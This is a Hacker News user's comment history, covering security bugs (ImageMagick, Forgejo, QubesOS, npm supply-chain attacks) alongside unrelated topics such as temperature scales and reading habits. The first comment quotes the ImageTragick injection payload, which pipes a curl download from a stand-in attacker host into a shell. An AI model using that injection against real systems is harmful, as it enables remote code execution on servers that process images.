HNHacker News
TopNewBestAskShowJobs

msm_

1,168 karma · joined January 25, 2023

tailcall.net @MsmCode github.com/msm-code @msm@infosec.exchange
submissionscomments
msm_··on A heap overflow and SSO misconfiguration to compromise OpenAI internal repos
Many of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help.

Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"

msm_··on T. Rex Had a Body Temperature of 97°F
Is it really better for day to day life? I am certain that it only appears so because you're used to it. I think for day to day life they're both roughly equivalent.

Of course, for me Celsius is more natural and intuitive, but again - that's because I'm used to it.

msm_··on Norton Neo Browser
In home environment: no, because Windows Defender is pretty good now. Some people install other antimalware solutions, but there's no great reason to do it.

In enterprise environment: definitely, for both compliance, management and actual security reasons.

msm_··on Norton Neo Browser
Maybe they actually do know their audience, and HN crowd is just... not that audience? I am pretty sure most people have no idea what's wrong with Norton, and the name just sounds vaguely like cybersecurity.
msm_··on Forgejo <=16.0.3 Critical RCE
>So if you don't create new repos from mystery meat template repos, you should be ok.

You should be OK, but if attacker takes over your user (or any user in your forgejo instance) they can execute code on the host server - as you said yourself. In other words, it allows them to achieve remote code execution, so it's a RCE.

msm_··on Forgejo <=16.0.3 Critical RCE
They could, and this is definitely a RCE (a Remote Code Execution) vulnerability. GP confusion stems from the fact, that you (the forgejo user) must execute this attack on "your" instance. But of course the problem is that forgejo user can, in fact, be malicious, and use this vulnerability to escalate their priviliges from user to server.

It can't be done without authenticating first, but there's nothing about RCE that says that it must be sent from unauthenticated connection.

msm_··on Claude, change the “Add to Cart” button to blue
You overthink this. Participating in HN is in no way like democratic voting. And sometimes it is my (or yours) comment that is the problem.

Let's not pretend that 90% of HN comments are world-changing. Maybe you are different, but a lot of my would-be comments are knee-jerk reactions that won't actually bring anything substantial to the discussion. Often in political comment chains. Yes, I feel I'm right, but it's still probably not worth posting. I really think that sometimes stopping before posting is better for everyone involved.

I also have well thought comments, where I share my thoughts on things I'm an expert in. I do post them. But a lot of the comments is not really that valuable.

>comments I spent literal hours on[2]

It may make you feel better that I saw both of your posts before (I may spend too much time on HN). They are good, though a bit verbose - maybe this intimidates people. But in this case I agree with GP - if I was spending literal hours responding to comments here I should definitely stop myself.

msm_··on South African diamond mines are closing due to weak sales and lab-grown stones
That was not the issue pointed by GP. They noted that the comparison was between two companies, a whole industry.

>That’s a weird comparaison between one or two brand and "an industry".

In other words, Impossible and Beyond are not the only companies in meat replacement space. They are probably the largest, but comparing them to the whole industry makes no sense.

msm_··on South African diamond mines are closing due to weak sales and lab-grown stones
What is a burger? If it looks like a burger and tastes like a burger I'm fine with calling it a burger. Nobody complains about halloumi burgers. Why is "coconut milk" OK, but "soy milk" is not? Blood sausage has nothing similar with the regular sausage. Hey, there are people who put pineapple on dough and call it "pizza"[1]. I agree that industries should not be able to intentionally mislead people, but informing customers was not the primary motivation behind those laws - protecting existing monopolies was.

[1] Relax, I'm joking.

msm_··on The revolt of the reader
It may be perfectly clear to you. For me (a non-native speaker) reading the first verse required a significant focus and I still didn't get what the author meant (only the general vibes).

The second verse was immediately clear.

msm_··on A/I shuts down
IRGC, Hamas, Hizballah and maybe others are far right organizations, so I don't think this is purely left/right.

And what about signal? I am pretty sure many violent/terrorist groups use it too.

I don't have an opinion about this group, because I didn't even know it existed. But, like often with things related to the free speech, I think this topic is more complex than you make it out to be.

msm_··on A/I shuts down
>But eventually you'll need to put down a credit card on file to buy a domain, and that domain needs to be owned by somebody.

You don't need to pay to host onion websites (.onion domains are free and have no central registry). Though that of course really limits the possible outreach, because most people are not used to browsing onionsites.

msm_··on Dwarf Fortress' creator says the industry's in shambles over AI
>Yeah, and by the time you get to many of those games they will feel clunky and outdated.

I don't agree with what you wrote literally (I almost exclusively play old and old-ish games, and I have fun), but:

>Path of Exile is a 2013 free-to-play action role-playing video game developed and published by Grinding Gear Games

I'm confused. Why is your example of a modern game is a game from 2013? Most people's backlog is probably shorter than 13 years, so if 13 year old games are fine then I'm not sure that contradicts OPs point.

msm_··on Arbitrary code execution in QubesOS via copy-to-VM error reporting backchannel
Wow, this is serious. Makes you think, that even though QubesOS attack surface is so tiny (well-designed to be secure) there are still vulnerabilities to be found.

Worth noting that (as I understand) this vulnerability occurs only when doing copy-to-VM from Dom0:

>Note that the VM variant of `qvm-copy-to-vm` is not affected, as its version of the error reporting function does not use `system()`:

Since you should not use Dom0 for regular work, and definitely not for interacting with likely-to-be-infected VMs, the scope of this attack is smaller than it sounds. On the flip side, when it works, it elevates privileges straight to Dom0.

msm_··on Our Servants Will Do That for Us
>Nobody likes self-checkout lines, but they’re “automated.”

I strongly prefer self-checkout. If self-checkout is available, I will use it. Most people I know have the same preference (to varying degrees, I am a bit extreme in that I will wait for self-checkout even if normal checkout is open and there is no queue).

msm_··on Keyv and friends compromised in active Shai-Hulud supply chain attack
This is moving the goalposts. The original problem was that installing a library should not execute code from that library.

In most sane environments, like for example native languages, this is already the case. Downloading a .dll file and putting it in an appropriate directory won't, by itself, execute code in that library.

You may argue that the code will get executed at some point anyway, but that's besides the point. Sandboxing the build environment is a different problem than sandboxing the test/staging/production environment.

I think we both agree that "adding random obstacles that don't actually protect anything" is not a valid approach to security, but my mental model of the build step is "transformation of input data into output data", and while this step may produce a malicious output from malicious inputs, it should not do anything malicious itself. For example, "gcc source.c" should not execute arbitrary code by itself.

msm_··on Keyv and friends compromised in active Shai-Hulud supply chain attack
>The idea is to have multiple strong layers, not a hundred half-measures that are all easily bypassed

Definitely. On the other hand, in my opinion, "not running arbitrary code during package install" is not a "half-measure", it's a basic sanity. This whole arbitrary code execution at install time is a convenience feature that was adapted by some package managers, but it was never a good idea.

Fortunately, nixos solves that for me in most cases.

msm_··on Ollama: All Aboard Open Models
Literally the main point of this blog post:

>The project’s binary distributions didn’t include the required MIT license notice for the llama.cpp code they were shipping. This isn’t a matter of open-source etiquette, the MIT license has exactly one major requirement: include the copyright notice. Ollama didn’t.

msm_··on Transcribe.cpp
It sounds like the only way this would make sense is if such model knew the range of sounds it expects to "hear". There's a lot of possible sounds that IPA knows about, but world languages only use a fraction of them at once. Think English dark and light "l" (ball/light) or aspirated "p" (pin/spin) - some languages contrast them, while in english the difference is not meaningful.

Or maybe linguists are actually interested in having maximally faithful IPA representation and manually normalizing it? You are clearly way more knowledgeable about that topic than I, so I'm curious what you think.

msm_··on Hardcore IndieWeb: Run your own website 100% independently for only $0.01/day
GP said:

>you shed a layer of security by deciding to make your address public, non of which would benefit the whole point

It's possible to host something with no intention of making it internet-public. I also have services like that, that I only use myself or with friends. GP argument is that they don't want to share the onion link to their website, because (bluntly) we are not invited. Onion domains are actually relatively private (i mean unguessable - unlike clearnet domains), so it's possible to host private websites without any additional authorization.

Having said that, onion links carry a implicit baggage, so while I think they're great for sharing things with (technical) friends or a private VPN, they're probably not the best way to host services intended for public.

msm_··on GitRoot
>In GitRoot everyting is stored in git, not in a database, not in a hidden blob in your git tree. Everything is stored in plain files aside your code.

>(...) If you add a user, by editing .gitroot/users.yml or by merging a branch where a user has added itself, this user will be able to push to the default branch. All GitRoot features are articulated around this concept (...)

msm_··on Regressive JPEGs
>I personally don't remember any visual progressive image buildup in like decades, so it's not doing anything valuable at all.

Maybe you just don't notice? It can be pretty invisible sometimes. I sometimes notice that image soon after page load an image is slightly blurry, and then another pass "sharpens" it. Yeah it's not like in the "old times" when the first progressive level was almost unreadable, but there's still value in sending a lower resolution version of image in 30% of the total file-size, basically for free

msm_··on A love letter to flashcards
Just as a datapoint - I really like learning with Anki. If there was another method that would let me learn at 200% speed, I would pick Anki.

This is moot anyway, because most other learning methods require longer focus and are not possible to do while on the go, during short commute in a tram, or 3 minute wait in a queue, and much more.

msm_··on It seems that the age of reading might be a short anomaly in human history
I exclusively read fiction, mostly fantasy books (I used to also read programming books, but all my learning is online now). I enjoy them. I don't feel the need to "improve".

Because of my job (and hobbies), I spend a lot of time thinking and straining my brain. After 14 hours of working I don't feel the urge to read Nietzsche or Plato. I admire people who do, but for me it's just a way to relax (and maybe escape from daily chores). Am I doing it bad?

msm_··on EU now one step away from reviving private message scanning rules
Of course, just like it instilled a desire to consume a lot of calorie-dense food. "Desire to protect the children" in this case is a knee-jerk reaction, or a thought terminating cliche.

For example, how many children will this actually protect? How many children will this harm? How many adults will be harmed by inevitable side-effects that arise? Those questions are not discussed or even considered.

msm_··on Every new car sold in the European Union must include a driver monitoring camera
>Regulators are responding to a real problem: EU-funded research estimates driver distraction plays a role in 5% to 25% of car crashes

>Article 6(3) of the GSR states that the system should be designed in such a way that it does not continuously record or retain data other than what is necessary for its purpose

I get that there are problems, but it doesn't sound that bad to me? Car drivers kill tens of thousands of people every year in Europe. If we can improve this 25% (more realistically, 10%) it's a huge step forward.

msm_··on Januscape: Guest-to-Host Escape in KVM/x86 [CVE-2026-53359]
Linux capabilities have many problems (they are too coarse-grained and too many capabilities are root-equivalent). But anyway this is an overkill in this case probably. In may distributions access to /dev/kvm is guarded by membership in the kvm group - no need for new capability, just regular old filesystem permissions.
msm_··on 1k Words: A Writing Contest
There are A LOT of cheaper ways to get some writing samples on the internet. This is just someone having fun, and creating an interesting challenge for others to have fun with.
msm_··on The Internet Is Dead and Nobody Cares [video]
>The Internet Is Dead and Nobody Cares

6 points, 1 comment (by author)

Checks out, I guess.

msm_··on How We Made IPFS Content Publishing 10x Faster
I don't know, it looks pretty decentralised to me?

>The purpose of this list is to allow IPFS node operators (e.g. someone running a public IPFS gateway) to opt into not hosting previously flagged content.

IPFS node operators, who are supposedly interested in hosting malicious content (and i2p-hosted phishings are a real problem) can OPT INTO using this list.

In this case, I don't see how that's any problem for piracy - people can just use one of the bad/unfiltered nodes.

Page 1 of 14Next →